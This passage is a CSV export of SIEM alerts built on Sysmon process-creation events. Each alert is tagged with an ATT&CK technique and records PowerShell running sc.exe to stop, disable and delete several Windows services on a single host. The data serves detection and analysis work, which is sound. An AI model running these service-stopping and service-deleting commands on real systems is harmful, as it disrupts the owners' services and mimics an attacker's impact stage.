Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.206",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.847 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-00100ad23000} +ProcessId: 772 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ExpressVNService +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.853244300Z"",""eventRecordID"":""3878"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.847\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-00100ad23000}\r\nProcessId: 772\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ExpressVNService\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.847"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-00100ad23000}"",""processId"":""772"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ExpressVNService"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:05.137",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.770 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-001067cf3000} +ProcessId: 5780 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WebServers +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WebServers",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.778669900Z"",""eventRecordID"":""3875"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.770\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-001067cf3000}\r\nProcessId: 5780\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WebServers\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.770"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-001067cf3000}"",""processId"":""5780"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WebServers"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.806",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.738 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-00101ece3000} +ProcessId: 5792 +Image: C:\Windows\System32\sc.exe +FileVersion: 
10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WebServers Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WebServers Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.744510600Z"",""eventRecordID"":""3874"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.738\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-00101ece3000}\r\nProcessId: 5792\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WebServers Start= 
Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.738"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-00101ece3000}"",""processId"":""5792"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WebServers Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 
14:21:04.697",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.695 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-0010f3cb3000} +ProcessId: 1664 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop taskmgr1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.697968600Z"",""eventRecordID"":""3871"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.695\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-0010f3cb3000}\r\nProcessId: 1664\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: 
Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop taskmgr1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.695"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-0010f3cb3000}"",""processId"":""1664"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop taskmgr1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.600",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.633 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-001088c93000} +ProcessId: 7776 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop wmiApServs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
wmiApServs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.639252300Z"",""eventRecordID"":""3868"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.633\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-001088c93000}\r\nProcessId: 7776\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop wmiApServs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:52:36.633"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-001088c93000}"",""processId"":""7776"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop wmiApServs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.566",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.561 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-00108fc73000} +ProcessId: 4912 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete wmiApSrvs +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: 
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete wmiApSrvs",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:52:36.577005500Z"",""eventRecordID"":""3866"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:52:36.561\r\nProcessGuid: {df9fc3d3-b414-5ecf-0000-00108fc73000}\r\nProcessId: 4912\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete wmiApSrvs\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:52:36.561"",""processGuid"":""{df9fc3d3-b414-5ecf-0000-00108fc73000}"",""processId"":""4912"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete wmiApSrvs"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:21:04.546",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:52:36.537 +ProcessGuid: {df9fc3d3-b414-5ecf-0000-0010c7c63000} +ProcessId: 6676 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® 